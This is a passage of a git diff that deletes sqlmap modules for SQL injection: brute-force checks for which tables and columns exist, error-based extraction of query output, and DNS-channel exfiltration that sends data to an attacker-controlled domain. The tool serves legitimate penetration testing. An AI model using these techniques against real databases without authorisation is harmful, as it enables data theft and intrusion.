dataToStdout("\n") - - if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: - infoMsg = "retrieved: %s" % filterControlChars(finalValue) - logger.info(infoMsg) - - if kb.threadException: - raise SqlmapThreadException("something unexpected happened inside the threads") - - if abortedFlag: - raise KeyboardInterrupt - - _ = finalValue or partialValue - - return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ - -def queryOutputLength(expression, payload): - """ - Returns the query output length. - """ - - infoMsg = "retrieving the length of query output" - logger.info(infoMsg) - - start = time.time() - - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) - count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) - - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - if length == " ": - length = 0 - - return length diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py deleted file mode 100644 index 12e6a13d..00000000 --- a/lib/techniques/brute/use.py +++ /dev/null @@ -1,272 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import filterListValue -from lib.core.common import getFileItems -from lib.core.common import Backend -from lib.core.common import getPageWordSet -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import safeStringFormat -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE -from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE -from lib.core.settings import METADB_SUFFIX -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.request import inject - -def _addPageTextWords(): - wordsList = [] - - infoMsg = "adding words used on web page to the check list" - logger.info(infoMsg) - pageWords = getPageWordSet(kb.originalPage) - - for word in pageWords: - word = word.lower() - - if len(word) > 2 and not word[0].isdigit() and word not in wordsList: - wordsList.append(word) - - return wordsList - -def tableExists(tableFile, regex=None): - if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: - warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) - warnMsg += "for common table existence check" - logger.warn(warnMsg) - - message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.tableExistsChoice = test[0] in ("y", "Y") - - if not kb.tableExistsChoice: - return None - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - if result: - errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) - - infoMsg = "checking table existence using items from '%s'" % tableFile - logger.info(infoMsg) - - tables.extend(_addPageTextWords()) - tables = filterListValue(tables, regex) - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(tables) - threadData.shared.value = [] - threadData.shared.unique = set() - - def tableExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s.%s" % (conf.db, table) - else: - fullTableName = table - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) - - kb.locks.io.acquire() - - if result and table.lower() not in threadData.shared.unique: - threadData.shared.value.append(table) - threadData.shared.unique.add(table.lower()) - - if conf.verbose in (1, 2) and not hasattr(conf, "api"): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, tableExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during table existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no table(s) found" - logger.warn(warnMsg) - else: - for item in threadData.shared.value: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [item] - else: - kb.data.cachedTables[conf.db].append(item) - - for _ in ((conf.db, item) for item in threadData.shared.value): - if _ not in kb.brute.tables: - kb.brute.tables.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) - - return kb.data.cachedTables - -def columnExists(columnFile, regex=None): - if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: - warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) - warnMsg += "for common column existence check" - logger.warn(warnMsg) - - message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.columnExistsChoice = test[0] in ("y", "Y") - - if not kb.columnExistsChoice: - return None - - if not conf.tbl: - errMsg = "missing table parameter" - raise SqlmapMissingMandatoryOptionException(errMsg) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) - - if result: - errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - infoMsg = "checking column existence using items from '%s'" % columnFile - logger.info(infoMsg) - - columns = getFileItems(columnFile, unique=True) - columns.extend(_addPageTextWords()) - columns = filterListValue(columns, regex) - - table = safeSQLIdentificatorNaming(conf.tbl, True) - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) - - kb.threadContinue = True - kb.bruteMode = True - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(columns) - threadData.shared.value = [] - - def columnExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) - - kb.locks.io.acquire() - - if result: - threadData.shared.value.append(column) - - if conf.verbose in (1, 2) and not hasattr(conf, "api"): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, columnExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during column existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no column(s) found" - logger.warn(warnMsg) - else: - columns = {} - - for column in threadData.shared.value: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): - result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) - else: - result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) - - if result: - columns[column] = "numeric" - else: - columns[column] = "non-numeric" - - kb.data.cachedColumns[conf.db] = {conf.tbl: columns} - - for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): - if _ not in kb.brute.columns: - kb.brute.columns.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) - - return kb.data.cachedColumns diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/dns/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py deleted file mode 100644 index 6ef66482..00000000 --- a/lib/techniques/dns/test.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import randomInt -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.exception import SqlmapNotVulnerableException -from lib.techniques.dns.use import dnsUse - - -def dnsTest(payload): - logger.info("testing for data retrieval through DNS channel") - - randInt = randomInt() - kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt) - - if not kb.dnsTest: - errMsg = "data retrieval through DNS channel failed" - if not conf.forceDns: - conf.dnsName = None - errMsg += ". Turning off DNS exfiltration support" - logger.error(errMsg) - else: - raise SqlmapNotVulnerableException(errMsg) - else: - infoMsg = "data retrieval through DNS channel was successful" - logger.info(infoMsg) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py deleted file mode 100644 index 1e4216ef..00000000 --- a/lib/techniques/dns/use.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from lib.core.common import extractRegexResult -from lib.core.common import getSQLSnippet -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import safeStringFormat -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.settings import DNS_BOUNDARIES_ALPHABET -from lib.core.settings import MAX_DNS_LABEL -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request - - -def dnsUse(payload, expression): - """ - Retrieve the output of a SQL query taking advantage of the DNS - resolution mechanism by making request back to attacker's machine. - """ - - start = time.time() - - retVal = None - count = 0 - offset = 1 - - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): - output = hashDBRetrieve(expression, checkConf=True) - - if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: - output = None - - if output is None: - kb.dnsMode = True - - while True: - count += 1 - prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 - _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) - nulledCastedField = agent.nullAndCastField(fieldToCastStr) - extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) - if extendedField != fieldToCastStr: # e.g. MIN(surname) - nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) - fieldToCastStr = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) - nulledCastedField = agent.hexConvertField(nulledCastedField) - expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) - expressionUnescaped = unescaper.escape(expressionRequest) - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): - query = agent.prefixQuery("; %s" % expressionUnescaped) - query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) - forgedPayload = agent.payload(newValue=query) - else: - forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) - - Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) - - _ = conf.dnsServer.pop(prefix, suffix) - - if _: - _ = extractRegexResult("%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) - _ = decodeHexValue(_) - output = (output or "") + _ - offset += len(_) - - if len(_) < chunk_length: - break - else: - break - - output = decodeHexValue(output) if conf.hexConvert else output - - kb.dnsMode = False - - if output is not None: - retVal = output - - if kb.dnsTest is not None: - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) - - if count > 0: - hashDBWrite(expression, output) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) - logger.debug(debugMsg) - - elif conf.dnsName: - warnMsg = "DNS data exfiltration method through SQL injection " - warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() - singleTimeWarnMessage(warnMsg) - - return safecharencode(retVal) if kb.safeCharEncode else retVal diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/techniques/error/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py deleted file mode 100644 index cb7fb7f0..00000000 --- a/lib/techniques/error/use.py +++ /dev/null @@ -1,442 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue -from lib.core.common import extractRegexResult -from lib.core.common import getPartRun -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import initTechnique -from lib.core.common import isListLike -from lib.core.common import isNumPosStrValue -from lib.core.common import listToStrValue -from lib.core.common import readInput -from lib.core.common import unArrayizeValue -from lib.core.convert import hexdecode -from lib.core.convert import htmlunescape -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTP_HEADER -from lib.core.exception import SqlmapDataException -from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MIN_ERROR_CHUNK_LENGTH -from lib.core.settings import MAX_ERROR_CHUNK_LENGTH -from lib.core.settings import NULL -from lib.core.settings import PARTIAL_VALUE_MARKER -from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar - -def _oneShotErrorUse(expression, field=None, chunkTest=False): - offset = 1 - partialValue = None - threadData = getCurrentThreadData() - retVal = hashDBRetrieve(expression, checkConf=True) - - if retVal and PARTIAL_VALUE_MARKER in retVal: - partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") - logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) - offset += len(partialValue) - - threadData.resumed = retVal is not None and not partialValue - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: - debugMsg = "searching for error chunk length..." - logger.debug(debugMsg) - - current = MAX_ERROR_CHUNK_LENGTH - while current >= MIN_ERROR_CHUNK_LENGTH: - testChar = str(current % 10) - testQuery = "SELECT %s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) - result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) - - if (result or "").startswith(testChar): - if result == testChar * current: - kb.errorChunkLength = current - break - else: - result = re.search(r"\A\w+", result).group(0) - candidate = len(result) - len(kb.chars.stop) - current = candidate if candidate != current else current - 1 - else: - current = current / 2 - - if kb.errorChunkLength: - hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) - else: - kb.errorChunkLength = 0 - - if retVal is None or partialValue: - try: - while True: - check = r"%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = r"%s(?P[^<\n]*)" % (kb.chars.start) - - if field: - nulledCastedField = agent.nullAndCastField(field) - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: - extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) - if extendedField != field: # e.g. MIN(surname) - nulledCastedField = extendedField.replace(field, nulledCastedField) - field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) - - # Forge the error-based SQL injection request - vector = kb.injection.data[kb.technique].vector - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - injExpression = expression.replace(field, nulledCastedField, 1) if field else expression - injExpression = unescaper.escape(injExpression) - injExpression = query.replace("[QUERY]", injExpression) - payload = agent.payload(newValue=injExpression) - - # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) - - incrementCounter(kb.technique) - - if page and conf.noEscape: - page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) - - # Parse the returned page to get the exact error-based - # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ - None) - - if output is not None: - output = getUnicode(output) - else: - trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) - - if trimmed: - if not chunkTest: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - - if not kb.testMode: - check = r"(?P[^<>\n]*?)%s" % kb.chars.stop[:2] - output = extractRegexResult(check, trimmed, re.IGNORECASE) - - if not output: - check = "(?P[^\s<>'\"]+)" - output = extractRegexResult(check, trimmed, re.IGNORECASE) - else: - output = output.rstrip() - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): - if offset == 1: - retVal = output - else: - retVal += output if output else '' - - if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: - offset += kb.errorChunkLength - else: - break - - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) - else: - retVal = output - break - except: - if retVal is not None: - hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) - raise - - retVal = decodeHexValue(retVal) if conf.hexConvert else retVal - - if isinstance(retVal, basestring): - retVal = htmlunescape(retVal).replace("
    ", "\n") - - retVal = _errorReplaceChars(retVal) - - if retVal is not None: - hashDBWrite(expression, retVal) - - else: - _ = "%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal - - return safecharencode(retVal) if kb.safeCharEncode else retVal - -def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): - values = [] - origExpr = None - - threadData = getCurrentThreadData() - - for field in expressionFieldsList: - output = None - - if field.startswith("ROWNUM "): - continue - - if isinstance(num, int): - origExpr = expression - expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) - - if "ROWNUM" in expressionFieldsList: - expressionReplaced = expression - else: - expressionReplaced = expression.replace(expressionFields, field, 1) - - output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) - - if not kb.threadContinue: - return None - - if not suppressOutput: - if kb.fileReadMode and output and output.strip(): - print - elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) - - if isinstance(num, int): - expression = origExpr - - values.append(output) - - return values - -def _errorReplaceChars(value): - """ - Restores safely replaced characters - """ - - retVal = value - - if value: - retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") - - return retVal - -def _formatPartialContent(value): - """ - Prepares (possibly hex-encoded) partial content for safe console output - """ - - if value and isinstance(value, basestring): - try: - value = hexdecode(value) - except: - pass - finally: - value = safecharencode(value) - - return value - -def errorUse(expression, dump=False): - """ - Retrieve the output of a SQL query taking advantage of the error-based - SQL injection vulnerability on the affected parameter. - """ - - initTechnique(kb.technique) - - abortedFlag = False - count = None - emptyFields = [] - start = time.time() - startLimit = 0 - stopLimit = None - value = None - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - - # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None - - # We have to check if the SQL query might return multiple entries - # and in such case forge the SQL limiting the query output one - # entry at a time - # NOTE: we assume that only queries that get data from a table can - # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) - - if limitCond: - # Count the number of SQL query entries output - countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) - count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields)) - - if isNumPosStrValue(count): - if isinstance(stopLimit, int) and stopLimit > 0: - stopLimit = min(int(count), int(stopLimit)) - else: - stopLimit = int(count) - - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) - - elif count and not count.isdigit(): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. " - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - else: - value = [] # for empty tables - return value - - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") - - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] - - numThreads = min(conf.threads, (stopLimit - startLimit)) - - threadData = getCurrentThreadData() - - try: - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) - - try: - def errorThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: - break - - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) - - if not kb.threadContinue: - break - - if output and isListLike(output) and len(output) == 1: - output = output[0] - - with kb.locks.value: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] - - runThreads(numThreads, errorThread) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = False - - if not value and not abortedFlag: - value = _errorFields(expression, expressionFields, expressionFieldsList) - - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = value[0] - - duration = calculateDeltaSeconds(start) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[kb.technique], duration) - logger.debug(debugMsg) - - return value diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py deleted file mode 100644 index c2e45792..00000000 --- 